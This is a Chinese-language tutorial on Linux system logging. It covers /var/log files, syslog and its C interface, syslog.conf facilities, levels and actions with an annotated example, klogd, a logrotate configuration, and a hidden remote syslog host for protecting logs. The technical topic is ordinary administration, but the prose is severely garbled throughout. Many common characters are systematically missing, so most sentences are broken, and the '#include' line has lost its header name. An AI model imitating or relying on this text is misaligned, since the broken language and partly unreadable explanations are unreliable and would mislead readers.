3. 错误志--由syslogd(8)执行各种系统守护进程、用户程序内核通syslog(3)向文件/var/log/messages报告值注意事件
2.察看志文件
Linux系统所志文件都/var/log且必须root权限才能察看
志文件其实纯文本文件每行消息察看式
1. cat命令志文件总第启Linux始消息都累积志文件文件页显示滚太快看清文件内容
2. 文本编辑器要用文本编辑器打志文件面耗费内存另面允许随意改志文件
3.用more或less页显示程序
4.用grep查找特定消息
每行表示消息且都由四域固定格式组:
n 间标签(timestamp)表示消息发期间
n 主机名(hostname)(我例主机名escher)表示消息计算机名字台计算机主机名能没必要网络环境使用syslog能要同主机消息发送台服务器集处理
n 消息系统名字"kernel"表示消息自内核或者进程名字表示发消息程序名字括号进程PID
n 消息(message)剩部消息内容
举例:
[root@localhost root]# 提示符输入:tail /var/log/messages
Jan 05 21:55:51 localhost last message repeated 3 times
Jan 05 21:55:51 localhost kernel: [drm] AGP 0.99 on Intel i810 @ 0xf0000000 128M
B
Jan 05 21:55:51 localhost kernel: [drm] Initialized i830 1.3.2 20021108 on minor
Jan 05 21:55:51 localhost kernel: mtrr: base(0xf0000000) is not aligned on a siz
e(0x12c000) boundary
Jan 05 21:56:35 localhost 1月 28 21:56:35 gdm(pam_unix)[4079]: session opened f
or user root by (uid=0)
Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 启(版本 2.
2.0)pid 4162 用户"root"
Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析址"xml:re
adonly:/etc/gconf/gconf.xml.mandatory"指向位于 0 读配置源
Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析址"xml:re
adwrite:/root/.gconf"指向位于 1 写入配置源
Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析址"xml:re
adonly:/etc/gconf/gconf.xml.defaults"指向位于 2 读配置源
Jan 05 21:58:20 localhost kernel: MSDOS FS: IO charset cp936
值注意与连接间志同进程统计系统默认激必须启Linux
系统启进程统计使用accton命令必须用root身份运行accton命令形式:accton
filefile必须事先存先使用touch命令创建pacct文件:touch
/var/log/pacct运行accton:accton
/var/log/pacct旦accton激使用lastcomm命令监测系统任何候执行命令若要关闭统计使用带任何
参数accton命令
3.志系统工作原理及配置
3.1 syslog
同closelog, openlog共同给system logger发送消息
Linux内核由系统组包括网络、文件访问、内存管理等系统需要给用户传送些消息些消息内容包括消息源及其重要性等所系统都要消息送维护公用消息区于叫Syslog程序
程序负责接收消息(比:系统核许系统程序产错误信息、警告信息其信息每信息都包括重要级)并消息发合适通情况
所消息都记录特定文件——志文件(通/var/adm或/var/log目录messages文件)特别重要消息用
户终端窗口显示
syslog工具两重要文件:syslogdsyslog.Conf
能接受访问系统志信息并且根据 "/etc/syslog.conf" 配置文件指令处理些信息守护进程内核提供访问系统志信息任何希望志信息程序都向 syslog 接口呼叫该信息
3.2 syslogd守护进程
象其复杂操作系统Linux由同系统组些叫做daemon程序直台运行(daemon:守护神意
说"默默闻"需要用户交互)处理些象打印、发送邮件、建立Internet连接等等工作每系统发志消息候都给
消息指定类型消息两部:"设备(facility)""级别(level)""设备"标识发消息系统同类型消息组合起"级别"表示消息重要性其范围debug(重要)emerg(重要)facilitylevel组合起称priority(详细解释参照5.3)
/usr/include/sys/syslog.h相关定义
用户看daemon程序没窗口用户界面些程序候要给用户传递些信息实现目需要特殊机制syslogddaemon例台运行并且消息志区转移志文件
函数接口
#include
void openlog( char * , int , int )
其值OR组合:
LOG_CONS : 消息送syslogd直接输系统console
LOG_NDELAY : 立即打syslogd连接默认连接第写入讯息才打
LOG_PERROR : 消息同送stderr
LOG_PID : PID记录每消息
void syslog( int , char * )
其facilitylevelOR组合
void closelog( void )
般需要用syslog()函数其函数用
3.3 syslog.conf
非重要文件位于"/etc/"目录通知 syslogd 何根据设备信息重要级别报告信息
该文件使用面形式:
facility.level action
syslog.conf 第列facility.level用指定志功能志级别间用.隔使用*匹配
所志功能志级别第二列action消息发目标
空白行#行注释忽略
Facility.level 字段称做选择域(seletor)
n facility 指定 syslog 功能主要包括些:
auth 由 pam_pwdb 报告认证
authpriv 包括特权信息用户名内认证
cron 与 cron at 关信息
daemon 与 inetd 守护进程关信息
kern 内核信息首先通 klogd 传递
lpr 与打印服务关信息
mail 与电邮件关信息
mark syslog 内部功能用于间戳
news 自新闻服务器信息
syslog 由 syslog 信息
user 由用户程序信息
uucp 由 uucp 信息
local0----local7 与自定义程序使用例使用 local5 做 ssh 功能
* 通配符代表除 mark 外所功能
level 级别决定讯息重要性
与每功能应优先级按定顺序排列emerg 高级其 alert依类推缺省 /etc/syslog.conf 记录指定级别该级别更高级别希望使用确定级别使用两运算符号(等)=
例:user.=info 表示告知 syslog 接受所 info 级别 user 功能信息
n 等级重要性逐递减:
emerg 该系统用
alert 需要立即修改条件
crit 阻止某些工具或系统功能实现错误条件
err 阻止工具或某些系统部功能实现错误条件
warning 预警信息
notice 具重要性普通条件
info 提供信息消息
debug 包含函数条件或问题其信息
none 没重要级通用于排错
* 所级别除none
n action 字段作域所表示具许灵性特别使用名称管道作用使 syslogd 处理信息
syslog 主要支持:
file 消息追加指定文件尾
terminal 或 print 完全串行或并行设备标志符
@host 远程志服务器
username 消息写指定用户
named pipe 指定使用 mkfifo 命令创建 FIFO 文件绝路径
* 消息写所用户
选择域指明消息类型优先级;作域指明syslogd接收与选择标准相匹配消息所执行作每选项由设备优先级组指明优先级syslogd纪录拥相同或更高优先级消息比指明"crit"则所标crit、alertemerg消息纪录每行行域指明选择域选择给定消息应该发送
实际站点配置(syslog.conf)文件:
# Store critical stuff in critical
#
*.=crit;kern.none /var/adm/critical
所信息优先权crit保存/var/adm/critical文件除些内核信息
# Kernel messages are first, stored in the kernel
# file, critical messages and higher ones also go
# to another host and to the console
#
kern.* /var/adm/kernel
kern.crit @finlandia
kern.crit /dev/console
kern.info;kern.!err /var/adm/kernel-info
第条代码指引些内核设备访问文件/var/adm/kernel信息
第二条代码直接引导所拥crit更高优先权内核信息访问远程主机存储远程主机仍旧试着找毁坏原
第四行说明syslogd 保存所拥info warning优先级内核信息/var/adm/kernel-info文件夹所err更高优先级排除外
# The tcp wrapper loggs with mail.info, we display
# all the connections on tty12
#
mail.=info /dev/tty12
引导所使用mail.info (in source LOG_MAIL | LOG_INFO)信息/dev/tty12第12
控制台例tcpwrapper
tcpd
(8)载缺省使用
# Store all mail concerning stuff in a file
mail.*;mail.!=info /var/adm/mail
模式匹配所具mail功能信息除拥info优先级保存文件/var/adm/mail
# Log all mail.info and news.info messages to info
#
mail,news.=info /var/adm/info
提取所具mail.info 或news.info 功能优先级信息存储文件/var/adm/info
# Log info and notice messages to messages file
#
*.=info;*.=notice;\
mail.none /var/log/messages
使所syslogd志具info 或notice功能信息存储文件/var/log/messages除所mail功能信息
# Log info messages to messages file
#
*.=info;\
mail,news.none /var/log/messages
声明使syslogd志所具info优先权信息存储/var/log/messages文件些mail 或news功能信息能存储
# Emergency messages will be displayed using wall
#
*.=emerg *
行代码告诉syslogd写所紧急信息所前登陆用户志实现
# Messages of the priority alert will be directed
# to the operator
#
*.alert root,joey
*.* @finlandia
代码指引所具alert 或更高级权限信息终端操作
第二行代码引导所信息叫做finlandia远程主机代码非用特别所syslog信息保存台机器群集计算机
3.4 klogd 守护进程
klogUNIX内核接受消息设备
klogd
守护进程获并记录 Linux 内核信息通syslogd 记录 klogd
传所信息说klogd读取内核信息并转发syslogd进程调用带 -f filename 变量 klogd
klogd filename 记录所信息传给 syslogd指定另外文件进行志记录klogd
向该文件写入所级别或优先权Klogd 没 /etc/syslog.conf 类似配置文件使用 klogd 避免使用
syslogd 处于查找量错误
总结
其箭代表发送消息给目标进程或者信息写入目标文件
图1 Linux志系统
志管理及志保护
logrotate程序用帮助用户管理志文件自守护进程工作logrotate周期性旋转志文件周期性每志文件重命名
备份名字让守护进程始使用志文件新拷贝/var/log/产maillog、maillog.1、
maillog.2、boot.log.1、boot.log.2类文件由配置文件驱该文件
/etc/logroatate.conf
logroatate.conf文件例:
# see "man logrotate" for details
# rotate log files weekly
weekly
#7周期
# keep 4 weeks worth of backlogs
rotate 4
#每隔4周备份志文件
# send errors to root
errors root
#发错误向root报告
# create new (empty) log files after rotating old ones
create
#转完旧志文件创建新志文件
# uncomment this if you want your log files compressed
#compress
#指定否压缩志文件
# RPM packages drop log rotation information into this directory
include /etc/logrotate.d
# no packages own lastlog or wtmp -- we'll rotate them here
/var/log/wtmp {
monthly
create 0664 root utmp
rotate 1
}
# system-specific logs may be configured here
网络应用种保护志式网络设定台秘密syslog主机台主机网卡设混杂模式用监听网内所syslog包
所需要传送志主机配置向台存主机发送志即即使黑客攻陷目标主机通syslog.conf文件找备份志主
机存主机实际操作辅交换机配置确保syslog包备份志主机syslog进程接受比
syslog.conf传送志主机设
@192.168.0.13实际网络存志主机实际能192.168.0.250或者其主机接受syslog包